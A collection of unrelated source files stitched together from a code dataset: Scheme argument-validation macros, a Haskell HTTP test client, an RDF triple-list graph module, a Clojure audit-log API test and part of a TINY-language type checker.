(if (member (car rest) default)
(loop (append-reverse head (cdr rest))
(cdr default-list)
(cons (car rest) result))
(lp (cdr rest) (cons (car rest) head)))
(if ((cdr default) (car rest))
(loop (append-reverse head (cdr rest))
(cdr default-list)
(cons (car rest) result))
(lp (cdr rest) (cons (car rest) head)))))))))))
((or (and (integer? number) (> number 0))
(eq? number +))
(and (not (every pair? default-list))
(if (string? caller)
(error caller default-list 'default-list
'(every pair? default-list))
(apply error "bad default list" default-list 'default-list
'(every pair? default-list) caller)))
(let loop ((rest rest-list)
(default default-list))
(if (or (null? rest) (null? default))
(apply values
(if (> default-length rest-length)
(append rest-list
(map car (list-tail default-list rest-length)))
rest-list))
(let ((arg (car rest))
(par (car default)))
(if (list? par)
(if (member arg par)
(loop (cdr rest) (cdr default))
(if (string? caller)
(error caller arg 'arg `(member arg ,par))
(apply error "unmatched argument"
arg 'arg `(member arg ,par) caller)))
(if ((cdr par) arg)
(loop (cdr rest) (cdr default))
(if (string? caller)
(error caller arg 'arg `(,(cdr par) arg))
(apply error "incorrect argument"
arg 'arg `(,(cdr par) arg) caller))))))))
(else
(apply values (if (> default-length rest-length)
(append rest-list (list-tail default-list rest-length))
rest-list))))))
(define-syntax arg-and
(syntax-rules()
((arg-and arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-and arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(error "incorrect argument" arg 'arg '(a1 a2 ...)))
...))
((arg-and caller arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-and caller arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax caller-arg-and
(syntax-rules()
((caller-arg-and caller arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-and caller arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))
((caller-arg-and null caller arg (a1 a2 ...) ...)
(and (or (symbol? 'arg)
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-and caller arg (a1 a2 ...) ...)))
(or (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax arg-ands
(syntax-rules (common)
((arg-ands (a1 a2 ...) ...)
(and (arg-and a1 a2 ...) ...))
((arg-ands common caller (a1 a2 ...) ...)
(and (caller-arg-and caller a1 a2 ...) ...))))
(define-syntax arg-or
(syntax-rules()
((arg-or arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-or arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(error "incorrect argument" arg 'arg '(a1 a2 ...)))
...))
((arg-or caller arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(arg-or caller arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax caller-arg-or
(syntax-rules()
((caller-arg-or caller arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-or caller arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))
((caller-arg-or null caller arg (a1 a2 ...) ...)
(or (and (not (symbol? 'arg))
(error "bad syntax" 'arg '(symbol? 'arg)
'(caller-arg-or caller arg (a1 a2 ...) ...)))
(and (a1 a2 ...)
(if (string? caller)
(error caller arg 'arg '(a1 a2 ...))
(error "incorrect argument" arg 'arg '(a1 a2 ...) caller)))
...))))
(define-syntax arg-ors
(syntax-rules (common)
((arg-ors (a1 a2 ...) ...)
(or (arg-or a1 a2 ...) ...))
((arg-ors common caller (a1 a2 ...) ...)
(or (caller-arg-or caller a1 a2 ...) ...))))
(define-syntax err-and
(syntax-rules ()
((err-and err expression ...)
(and (or expression
(if (string? err)
(error err 'expression)
(error "false expression" 'expression err)))
...))))
(define-syntax err-ands
(syntax-rules ()
((err-ands (err expression ...) ...)
(and (err-and err expression ...)
...))))
(define-syntax err-or
(syntax-rules ()
((err-or err expression ...)
(or (and expression
(if (string? err)
(error err 'expression)
(error "true expression" 'expression err)))
...))))
(define-syntax err-ors
(syntax-rules ()
((err-ors (err expression ...) ...)
(or (err-or err expression ...)
...))))
|
0f6bc9365a64d96d3ad69bddf5c17e8e8785566efd05e0afc48c2398e4aeb455 | snoyberg/http-client | test.hs | {-# LANGUAGE OverloadedStrings #-}
import Network.HTTP.Conduit
import Network
import qualified Data.ByteString as S
import qualified Data.ByteString.Lazy as L
import System.Environment.UTF8 (getArgs, getEnv)
import Data.CaseInsensitive (original)
import Data.Conduit
import Control.Monad.IO.Class (liftIO)
import Control.Exception (finally)
import Network.Socks5 (SocksConf(..), defaultSocksConf)
-- | Attach a SOCKS proxy on port 1080 to the request when a proxy host
-- is configured; an empty host string means "no proxy".
mproxify sockshost req =
    if sockshost == ""
        then req
        else req { socksProxy = Just (defaultSocksConf sockshost 1080) }
-- | Fetch the URL named on the command line -- optionally through the
-- SOCKS proxy given in $SOCKS_PROXY -- and dump the response status,
-- headers and body to stdout.  'printOpenSockets' runs on the way out
-- regardless of success or failure (via 'finally').
main :: IO ()
main = do
    [url] <- getArgs
    proxyHost <- catch (getEnv "SOCKS_PROXY") (const (return ""))
    req <- fmap (mproxify proxyHost) (parseUrl url)
    fetchAndPrint req `finally` printOpenSockets
  where
    -- Perform the request and print status line, headers, then body.
    fetchAndPrint req = runResourceT $ do
        man <- newManager
        Response sc hs body <- httpLbs req man
        liftIO $ do
            print sc
            mapM_ printHeader hs
            putStrLn ""
            L.putStr body
    -- One "Name: value" line per response header.
    printHeader (name, value) = do
        S.putStr (original name)
        putStr ": "
        S.putStr value
        putStrLn ""
| null | https://raw.githubusercontent.com/snoyberg/http-client/106951809b3e1c796ffd6cccefc4c1fad16df7c9/http-conduit/test.hs | haskell | # LANGUAGE OverloadedStrings #
let req = urlEncodedBody
[ ("foo", "bar")
, ("baz%%38**.8fn", "bin")
] _req2
| import Network.HTTP.Conduit
import Network
import qualified Data.ByteString as S
import qualified Data.ByteString.Lazy as L
import System.Environment.UTF8 (getArgs, getEnv)
import Data.CaseInsensitive (original)
import Data.Conduit
import Control.Monad.IO.Class (liftIO)
import Control.Exception (finally)
import Network.Socks5 (SocksConf(..), defaultSocksConf)
mproxify sockshost req
| sockshost == "" = req
| otherwise = req { socksProxy = Just $ defaultSocksConf sockshost 1080 }
main :: IO ()
main = do
[url] <- getArgs
proxy <- catch (getEnv "SOCKS_PROXY") (const $ return "")
_req2 <- mproxify proxy `fmap` parseUrl url
flip finally printOpenSockets $ runResourceT $ do
man <- newManager
Response sc hs b <- httpLbs _req2 man
liftIO $ do
print sc
mapM_ (\(x, y) -> do
S.putStr $ original x
putStr ": "
S.putStr y
putStrLn "") hs
putStrLn ""
L.putStr b
|
e5eef3c1af4f1026b31e147f260c067ae8d6a0e9cec0f10e61f72ee32dc75351 | robstewart57/rdf4h | TList.hs | # LANGUAGE CPP #
{-# LANGUAGE DeriveAnyClass #-}
# LANGUAGE DataKinds #
# LANGUAGE FlexibleInstances #
# LANGUAGE TypeFamilies #
# LANGUAGE DeriveGeneric #
{-# LANGUAGE EmptyDataDecls #-}
-- |"TriplesGraph" contains a list-backed graph implementation suitable
-- for smallish graphs or for temporary graphs that will not be queried.
-- It maintains the triples in the order that they are given in, and is
-- especially useful for holding N-Triples, where it is often desirable
-- to preserve the order of the triples when they were originally parsed.
-- Duplicate triples are not filtered. If you might have duplicate triples,
-- use @MGraph@ instead, which is also more efficient. However, the query
-- functions of this graph (select, query) remove duplicates from their
-- result triples (but triplesOf does not) since it is usually cheap
-- to do so.
module Data.RDF.Graph.TList (TList) where
import Prelude
#if MIN_VERSION_base(4,9,0)
#if !MIN_VERSION_base(4,11,0)
import Data.Semigroup
#else
#endif
#else
#endif
import Control.DeepSeq (NFData)
import Data.Binary
import Data.RDF.Namespace
import Data.RDF.Query
import Data.RDF.Types (RDF,Rdf(..),Triple(..),Subject,Predicate,Object,NodeSelector,Triples,BaseUrl)
import Data.List (nub)
import GHC.Generics
-- |A simple implementation of the 'RDF' type class that represents
-- the graph internally as a list of triples.
--
-- Note that this type of RDF is fine for interactive
-- experimentation and querying of smallish (< 10,000 triples) graphs,
-- but there are better options for larger graphs or graphs that you
-- will do many queries against (e.g., @MGraph@ is faster for queries).
--
-- The time complexity of the functions (where n == num_triples) are:
--
-- * 'empty' : O(1)
--
-- * 'mkRdf' : O(n)
--
-- * 'triplesOf' : O(1)
--
-- * 'select' : O(n)
--
-- * 'query' : O(n)
-- | Uninhabited tag type selecting the list-backed graph representation
-- at the type level.
data TList deriving (Generic)
instance Binary TList
instance NFData TList
-- | Graph payload: the triples (in insertion order, duplicates allowed),
-- an optional base URL, and the prefix mappings.
data instance RDF TList = TListC (Triples, Maybe BaseUrl, PrefixMappings)
                          deriving (Generic,NFData)
-- | Wire the list-backed primitives into the 'Rdf' class; the real work
-- is done by the primed top-level functions defined below.
instance Rdf TList where
  baseUrl = baseUrl'
  prefixMappings = prefixMappings'
  addPrefixMappings = addPrefixMappings'
  empty = empty'
  mkRdf = mkRdf'
  addTriple = addTriple'
  removeTriple = removeTriple'
  triplesOf = triplesOf'
  uniqTriplesOf = uniqTriplesOf'
  select = select'
  query = query'
  showGraph = showGraph'
-- | Render the graph as text: each prefix-expanded triple's 'show'
-- form on its own line.
showGraph' :: RDF TList -> String
showGraph' = unlines . map show . expandTriples
-- | The prefix mappings stored alongside the triples.
prefixMappings' :: RDF TList -> PrefixMappings
prefixMappings' (TListC (_, _, mappings)) = mappings
-- | Merge new prefix mappings into the graph.  When the flag is True
-- the incoming mappings form the left operand of '<>'; otherwise the
-- existing ones do (precedence on key collisions therefore follows the
-- 'Semigroup' instance of 'PrefixMappings').
addPrefixMappings' :: RDF TList -> PrefixMappings -> Bool -> RDF TList
addPrefixMappings' (TListC (ts, base, existing)) incoming replace =
    TListC (ts, base, combined)
  where
    combined
      | replace   = incoming <> existing
      | otherwise = existing <> incoming
-- | The base URL recorded at construction time, if any.
baseUrl' :: RDF TList -> Maybe BaseUrl
baseUrl' (TListC (_, mBase, _)) = mBase
-- | A graph with no triples, no base URL, and empty prefix mappings.
empty' :: RDF TList
empty' = TListC(mempty, Nothing, PrefixMappings mempty)
-- We no longer remove duplicates here, as it is very time consuming and is often not
-- necessary (raptor does not seem to remove dupes either). Instead, we remove dupes
-- from the results of the select' and query' functions, since it is cheap to do
-- there in most cases, but not when triplesOf' is called.
-- | Build a graph directly from the given triples, base URL and prefix
-- mappings; the triple list is stored as-is (no dedup, no copy).
mkRdf' :: Triples -> Maybe BaseUrl -> PrefixMappings -> RDF TList
mkRdf' ts baseURL pms = TListC (ts, baseURL, pms)
-- | Prepend a triple to the graph in O(1); duplicates are not checked.
addTriple' :: RDF TList -> Triple -> RDF TList
addTriple' (TListC (existing, base, mappings)) triple =
    TListC (triple : existing, base, mappings)
-- | Drop every occurrence of the given triple from the graph (O(n)).
removeTriple' :: RDF TList -> Triple -> RDF TList
removeTriple' (TListC (ts, base, mappings)) triple =
    TListC (filter (/= triple) ts, base, mappings)
-- | The stored triples, in insertion order and with duplicates kept.
triplesOf' :: RDF TList -> Triples
triplesOf' (TListC (ts, _, _)) = ts
-- | The prefix-expanded triples with duplicates removed.
-- NOTE(review): 'nub' is O(n^2), acceptable for the smallish graphs
-- this backend targets.
uniqTriplesOf' :: RDF TList -> Triples
uniqTriplesOf' g = nub (expandTriples g)
-- | All distinct triples whose subject, predicate and object are each
-- accepted by the corresponding selector (a 'Nothing' selector matches
-- anything); duplicates are removed from the result.
select' :: RDF TList -> NodeSelector -> NodeSelector -> NodeSelector -> Triples
select' g s p o = nub [t | t <- triplesOf g, matchSelect s p o t]
-- | All distinct triples matching the given fixed subject/predicate/
-- object pattern; a 'Nothing' position matches anything.
query' :: RDF TList -> Maybe Subject -> Maybe Predicate -> Maybe Object -> Triples
query' g s p o = nub [t | t <- triplesOf g, matchPattern s p o t]
-- | True when every supplied selector function accepts the
-- corresponding node of the triple; a 'Nothing' selector accepts any
-- node.
matchSelect :: NodeSelector -> NodeSelector -> NodeSelector -> Triple -> Bool
matchSelect s p o (Triple s' p' o') =
    checks s s' && checks p p' && checks o o'
  where
    checks Nothing  _ = True
    checks (Just f) n = f n
-- | True when every supplied node equals the corresponding node of the
-- triple; a 'Nothing' position matches any node.
matchPattern :: Maybe Subject -> Maybe Predicate -> Maybe Object -> Triple -> Bool
matchPattern s p o (Triple s' p' o') =
    agrees s s' && agrees p p' && agrees o o'
  where
    agrees Nothing  _ = True
    agrees (Just x) y = x == y
| null | https://raw.githubusercontent.com/robstewart57/rdf4h/22538a916ec35ad1c46f9946ca66efed24d95c75/src/Data/RDF/Graph/TList.hs | haskell | # LANGUAGE DeriveAnyClass #
# LANGUAGE EmptyDataDecls #
|"TriplesGraph" contains a list-backed graph implementation suitable
for smallish graphs or for temporary graphs that will not be queried.
It maintains the triples in the order that they are given in, and is
especially useful for holding N-Triples, where it is often desirable
to preserve the order of the triples when they were originally parsed.
Duplicate triples are not filtered. If you might have duplicate triples,
use @MGraph@ instead, which is also more efficient. However, the query
functions of this graph (select, query) remove duplicates from their
result triples (but triplesOf does not) since it is usually cheap
to do so.
the graph internally as a list of triples.
but there are better options for larger graphs or graphs that you
will do many queries against (e.g., @MGraph@ is faster for queries).
The time complexity of the functions (where n == num_triples) are:
* 'empty' : O(1)
* 'select' : O(n)
* 'query' : O(n)
We no longer remove duplicates here, as it is very time consuming and is often not
necessary (raptor does not seem to remove dupes either). Instead, we remove dupes
from the results of the select' and query' functions, since it is cheap to do
there in most cases, but not when triplesOf' is called. | # LANGUAGE CPP #
# LANGUAGE DataKinds #
# LANGUAGE FlexibleInstances #
# LANGUAGE TypeFamilies #
# LANGUAGE DeriveGeneric #
module Data.RDF.Graph.TList (TList) where
import Prelude
#if MIN_VERSION_base(4,9,0)
#if !MIN_VERSION_base(4,11,0)
import Data.Semigroup
#else
#endif
#else
#endif
import Control.DeepSeq (NFData)
import Data.Binary
import Data.RDF.Namespace
import Data.RDF.Query
import Data.RDF.Types (RDF,Rdf(..),Triple(..),Subject,Predicate,Object,NodeSelector,Triples,BaseUrl)
import Data.List (nub)
import GHC.Generics
|A simple implementation of the ' RDF ' type class that represents
Note that this type of RDF is fine for interactive
experimentation and querying of smallish ( < 10,000 triples ) graphs ,
* ' mkRdf ' : O(n )
* ' triplesOf ' : )
data TList deriving (Generic)
instance Binary TList
instance NFData TList
data instance RDF TList = TListC (Triples, Maybe BaseUrl, PrefixMappings)
deriving (Generic,NFData)
instance Rdf TList where
baseUrl = baseUrl'
prefixMappings = prefixMappings'
addPrefixMappings = addPrefixMappings'
empty = empty'
mkRdf = mkRdf'
addTriple = addTriple'
removeTriple = removeTriple'
triplesOf = triplesOf'
uniqTriplesOf = uniqTriplesOf'
select = select'
query = query'
showGraph = showGraph'
showGraph' :: RDF TList -> String
showGraph' gr = concatMap (\t -> show t <> "\n") (expandTriples gr)
prefixMappings' :: RDF TList -> PrefixMappings
prefixMappings' (TListC(_, _, pms)) = pms
addPrefixMappings' :: RDF TList -> PrefixMappings -> Bool -> RDF TList
addPrefixMappings' (TListC(ts, baseURL, pms)) pms' replace =
let merge = if replace then flip (<>) else (<>)
in TListC(ts, baseURL, merge pms pms')
baseUrl' :: RDF TList -> Maybe BaseUrl
baseUrl' (TListC(_, baseURL, _)) = baseURL
empty' :: RDF TList
empty' = TListC(mempty, Nothing, PrefixMappings mempty)
mkRdf' :: Triples -> Maybe BaseUrl -> PrefixMappings -> RDF TList
mkRdf' ts baseURL pms = TListC (ts, baseURL, pms)
addTriple' :: RDF TList -> Triple -> RDF TList
addTriple' (TListC (ts, bURL, preMapping)) t = TListC (t:ts,bURL,preMapping)
removeTriple' :: RDF TList -> Triple -> RDF TList
removeTriple' (TListC (ts, bURL, preMapping)) t = TListC (newTs,bURL,preMapping)
where newTs = filter (/= t) ts
triplesOf' :: RDF TList -> Triples
triplesOf' ((TListC(ts, _, _))) = ts
uniqTriplesOf' :: RDF TList -> Triples
uniqTriplesOf' = nub . expandTriples
select' :: RDF TList -> NodeSelector -> NodeSelector -> NodeSelector -> Triples
select' g s p o = nub $ filter (matchSelect s p o) $ triplesOf g
query' :: RDF TList -> Maybe Subject -> Maybe Predicate -> Maybe Object -> Triples
query' g s p o = nub $ filter (matchPattern s p o) $ triplesOf g
matchSelect :: NodeSelector -> NodeSelector -> NodeSelector -> Triple -> Bool
matchSelect s p o (Triple s' p' o') = match s s' && match p p' && match o o'
where match fn n = maybe True ($ n) fn
matchPattern :: Maybe Subject -> Maybe Predicate -> Maybe Object -> Triple -> Bool
matchPattern s p o (Triple s' p' o') = match s s' && match p p' && match o o'
where match n1 n2 = maybe True (==n2) n1
|
fb75a43f6ffbd15a1c976fca284f93d0087c2c9c9e772678afef05c5025dea7b | CSCfi/rems | test_audit_log.clj | (ns ^:integration rems.api.test-audit-log
(:require [clj-time.core :as time]
[clojure.test :refer :all]
[rems.api.testing :refer :all]
[rems.db.api-key :as api-key]
[rems.db.test-data-helpers :as test-helpers]
[rems.handler :refer [handler]]
[ring.mock.request :refer :all]))
(use-fixtures :each api-fixture)
(deftest test-audit-log
(api-key/add-api-key! "42" {})
(test-helpers/create-user! {:userid "alice"})
(test-helpers/create-user! {:userid "malice"})
(test-helpers/create-user! {:userid "owner"} :owner)
(test-helpers/create-user! {:userid "reporter"} :reporter)
(let [time-a (atom nil)
app-id (test-helpers/create-application! {:actor "alice"})]
(test-helpers/command! {:type :application.command/submit
:application-id app-id
:actor "alice"})
(testing "populate log"
(testing "> unknown endpoint"
(testing "> no user"
(is (response-is-not-found? (-> (request :get "/api/unknown")
handler))))
(testing "> valid api-key and user"
(is (response-is-not-found? (-> (request :get "/api/unknown")
(authenticate "42" "owner")
handler)))))
(testing "> known endpoint"
(testing "> api key"
(testing "> GET"
(testing "> unauthorized"
(is (response-is-forbidden? (-> (request :get "/api/users/active")
(authenticate "42" "alice")
handler))))
(testing "> authorized"
(is (response-is-ok? (-> (request :get "/api/users/active")
(authenticate "42" "owner")
handler))))
(Thread/sleep 2)
(reset! time-a (time/now))
(testing "> application"
(is (response-is-ok? (-> (request :get (str "/api/applications/" app-id))
(authenticate "42" "alice")
handler)))
(is (response-is-ok? (-> (request :get (str "/api/applications/" app-id "/pdf"))
(authenticate "42" "reporter")
handler)))))
(testing "> POST"
(testing "> status 200, different api key"
(api-key/add-api-key! "43" {})
;; this is actually a {:success false} response since
;; the application doesn't exist, but here we only care
;; about the HTTP status.
(is (response-is-ok? (-> (request :post "/api/applications/submit")
(authenticate "43" "alice")
(json-body {:application-id 99999999999})
handler))))
(testing "> status 400"
(is (response-is-bad-request? (-> (request :post "/api/applications/submit")
(authenticate "42" "alice")
(json-body {:boing "3"})
handler))))
(testing "> status 500"
(with-redefs [rems.service.command/command! (fn [_] (throw (Error. "BOOM")))]
(is (response-is-server-error? (-> (request :post "/api/applications/submit")
(authenticate "42" "alice")
(json-body {:application-id 3})
handler)))))))
(testing "> session"
(let [cookie (login-with-cookies "malice")
csrf (get-csrf-token cookie)]
(testing "> GET"
(is (response-is-ok? (-> (request :get "/api/catalogue")
(header "Cookie" cookie)
(header "x-csrf-token" csrf)
handler))))
(testing "> failed PUT"
(is (response-is-forbidden? (-> (request :put "/api/catalogue-items/archived")
(header "Cookie" cookie)
(header "x-csrf-token" csrf)
(json-body {:id 9999999 :archived true})
handler))))))))
(testing "user can't get log"
(is (response-is-forbidden? (-> (request :get "/api/audit-log")
(authenticate "42" "alice")
handler))))
(testing "reporter can get log"
(is (= [{:userid nil :apikey nil :method "get" :path "/api/unknown" :status "404"}
{:userid "owner" :apikey "42" :method "get" :path "/api/unknown" :status "404"}
{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "owner" :apikey "42" :method "get" :path "/api/users/active" :status "200"}
{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "reporter" :apikey "42" :method "get" :path (str "/api/applications/" app-id "/pdf") :status "200"}
{:userid "alice" :apikey "43" :method "post" :path "/api/applications/submit" :status "200"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "400"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "500"}
{:userid "malice" :apikey nil :method "get" :path "/api/catalogue" :status "200"}
{:userid "malice" :apikey nil :method "put" :path "/api/catalogue-items/archived" :status "403"}
{:userid "alice" :apikey "42" :method "get" :path "/api/audit-log" :status "403"}]
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log")
(authenticate "42" "reporter")
handler
read-ok-body)))))
(testing "filtering log by user"
(is (= [{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "alice" :apikey "43" :method "post" :path "/api/applications/submit" :status "200"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "400"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "500"}
{:userid "alice" :apikey "42" :method "get" :path "/api/audit-log" :status "403"}]
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log?userid=alice")
(authenticate "42" "reporter")
handler
read-ok-body)))))
(testing "filtering log by time"
(is (= [{:userid nil :apikey nil :method "get" :path "/api/unknown" :status "404"}
{:userid "owner" :apikey "42" :method "get" :path "/api/unknown" :status "404"}
{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "owner" :apikey "42" :method "get" :path "/api/users/active" :status "200"}]
(mapv #(dissoc % :time)
(-> (request :get (str "/api/audit-log?after=2000-01&before=" @time-a))
(authenticate "42" "reporter")
handler
read-ok-body))))
(is (= []
(-> (request :get "/api/audit-log?after=2100-01")
(authenticate "42" "reporter")
handler
read-ok-body))))
(testing "filtering log by application"
(is (= [{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "reporter" :apikey "42" :method "get" :path (str "/api/applications/" app-id "/pdf") :status "200"}]
(mapv #(dissoc % :time)
(-> (request :get (str "/api/audit-log?application-id=" app-id))
(authenticate "42" "reporter")
handler
read-ok-body))))
(is (= []
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log?application-id=99999999")
(authenticate "42" "reporter")
handler
read-ok-body)))))))
| null | https://raw.githubusercontent.com/CSCfi/rems/490087c4d58339c908da792111029fbaf817a26f/test/clj/rems/api/test_audit_log.clj | clojure | this is actually a {:success false} response since
the application doesn't exist, but here we only care
about the HTTP status. | (ns ^:integration rems.api.test-audit-log
(:require [clj-time.core :as time]
[clojure.test :refer :all]
[rems.api.testing :refer :all]
[rems.db.api-key :as api-key]
[rems.db.test-data-helpers :as test-helpers]
[rems.handler :refer [handler]]
[ring.mock.request :refer :all]))
(use-fixtures :each api-fixture)
(deftest test-audit-log
(api-key/add-api-key! "42" {})
(test-helpers/create-user! {:userid "alice"})
(test-helpers/create-user! {:userid "malice"})
(test-helpers/create-user! {:userid "owner"} :owner)
(test-helpers/create-user! {:userid "reporter"} :reporter)
(let [time-a (atom nil)
app-id (test-helpers/create-application! {:actor "alice"})]
(test-helpers/command! {:type :application.command/submit
:application-id app-id
:actor "alice"})
(testing "populate log"
(testing "> unknown endpoint"
(testing "> no user"
(is (response-is-not-found? (-> (request :get "/api/unknown")
handler))))
(testing "> valid api-key and user"
(is (response-is-not-found? (-> (request :get "/api/unknown")
(authenticate "42" "owner")
handler)))))
(testing "> known endpoint"
(testing "> api key"
(testing "> GET"
(testing "> unauthorized"
(is (response-is-forbidden? (-> (request :get "/api/users/active")
(authenticate "42" "alice")
handler))))
(testing "> authorized"
(is (response-is-ok? (-> (request :get "/api/users/active")
(authenticate "42" "owner")
handler))))
(Thread/sleep 2)
(reset! time-a (time/now))
(testing "> application"
(is (response-is-ok? (-> (request :get (str "/api/applications/" app-id))
(authenticate "42" "alice")
handler)))
(is (response-is-ok? (-> (request :get (str "/api/applications/" app-id "/pdf"))
(authenticate "42" "reporter")
handler)))))
(testing "> POST"
(testing "> status 200, different api key"
(api-key/add-api-key! "43" {})
(is (response-is-ok? (-> (request :post "/api/applications/submit")
(authenticate "43" "alice")
(json-body {:application-id 99999999999})
handler))))
(testing "> status 400"
(is (response-is-bad-request? (-> (request :post "/api/applications/submit")
(authenticate "42" "alice")
(json-body {:boing "3"})
handler))))
(testing "> status 500"
(with-redefs [rems.service.command/command! (fn [_] (throw (Error. "BOOM")))]
(is (response-is-server-error? (-> (request :post "/api/applications/submit")
(authenticate "42" "alice")
(json-body {:application-id 3})
handler)))))))
(testing "> session"
(let [cookie (login-with-cookies "malice")
csrf (get-csrf-token cookie)]
(testing "> GET"
(is (response-is-ok? (-> (request :get "/api/catalogue")
(header "Cookie" cookie)
(header "x-csrf-token" csrf)
handler))))
(testing "> failed PUT"
(is (response-is-forbidden? (-> (request :put "/api/catalogue-items/archived")
(header "Cookie" cookie)
(header "x-csrf-token" csrf)
(json-body {:id 9999999 :archived true})
handler))))))))
(testing "user can't get log"
(is (response-is-forbidden? (-> (request :get "/api/audit-log")
(authenticate "42" "alice")
handler))))
(testing "reporter can get log"
(is (= [{:userid nil :apikey nil :method "get" :path "/api/unknown" :status "404"}
{:userid "owner" :apikey "42" :method "get" :path "/api/unknown" :status "404"}
{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "owner" :apikey "42" :method "get" :path "/api/users/active" :status "200"}
{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "reporter" :apikey "42" :method "get" :path (str "/api/applications/" app-id "/pdf") :status "200"}
{:userid "alice" :apikey "43" :method "post" :path "/api/applications/submit" :status "200"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "400"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "500"}
{:userid "malice" :apikey nil :method "get" :path "/api/catalogue" :status "200"}
{:userid "malice" :apikey nil :method "put" :path "/api/catalogue-items/archived" :status "403"}
{:userid "alice" :apikey "42" :method "get" :path "/api/audit-log" :status "403"}]
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log")
(authenticate "42" "reporter")
handler
read-ok-body)))))
(testing "filtering log by user"
(is (= [{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "alice" :apikey "43" :method "post" :path "/api/applications/submit" :status "200"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "400"}
{:userid "alice" :apikey "42" :method "post" :path "/api/applications/submit" :status "500"}
{:userid "alice" :apikey "42" :method "get" :path "/api/audit-log" :status "403"}]
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log?userid=alice")
(authenticate "42" "reporter")
handler
read-ok-body)))))
(testing "filtering log by time"
(is (= [{:userid nil :apikey nil :method "get" :path "/api/unknown" :status "404"}
{:userid "owner" :apikey "42" :method "get" :path "/api/unknown" :status "404"}
{:userid "alice" :apikey "42" :method "get" :path "/api/users/active" :status "403"}
{:userid "owner" :apikey "42" :method "get" :path "/api/users/active" :status "200"}]
(mapv #(dissoc % :time)
(-> (request :get (str "/api/audit-log?after=2000-01&before=" @time-a))
(authenticate "42" "reporter")
handler
read-ok-body))))
(is (= []
(-> (request :get "/api/audit-log?after=2100-01")
(authenticate "42" "reporter")
handler
read-ok-body))))
(testing "filtering log by application"
(is (= [{:userid "alice" :apikey "42" :method "get" :path (str "/api/applications/" app-id) :status "200"}
{:userid "reporter" :apikey "42" :method "get" :path (str "/api/applications/" app-id "/pdf") :status "200"}]
(mapv #(dissoc % :time)
(-> (request :get (str "/api/audit-log?application-id=" app-id))
(authenticate "42" "reporter")
handler
read-ok-body))))
(is (= []
(mapv #(dissoc % :time)
(-> (request :get "/api/audit-log?application-id=99999999")
(authenticate "42" "reporter")
handler
read-ok-body)))))))
|
0637d6a69749ad874b4ae8902409f6117e63d001c870231f4c1ce6cd14b48fd1 | kahaani/TINY-in-Haskell | TypeCheck.hs | module TypeCheck (
typeCheck
) where
import Control.Monad.Error
import Scan (Token(..))
import Parse (Stmt(..), Exp(..))
data ExpType = VoidT | IntegerT | BooleanT deriving (Eq)
typeCheck :: [Stmt] -> [Stmt]
typeCheck stmts = case typeCheckStmts stmts of
Right () -> stmts
Left err -> error $ "Type Error: " ++ err
typeCheckStmts :: [Stmt] -> Either String ()
typeCheckStmts = mapM_ typeCheckStmt
typeCheckStmt :: Stmt -> Either String ()
typeCheckStmt (If2K exp stmts) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "if test is not Boolean"
typeCheckStmts stmts
typeCheckStmt (If3K exp stmts1 stmts2) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "if test is not Boolean"
typeCheckStmts stmts1
typeCheckStmts stmts2
typeCheckStmt (RepeatK stmts exp) = do
type1 <- typeCheckExp exp
assert (type1 == BooleanT) "repeat test is not Boolean"
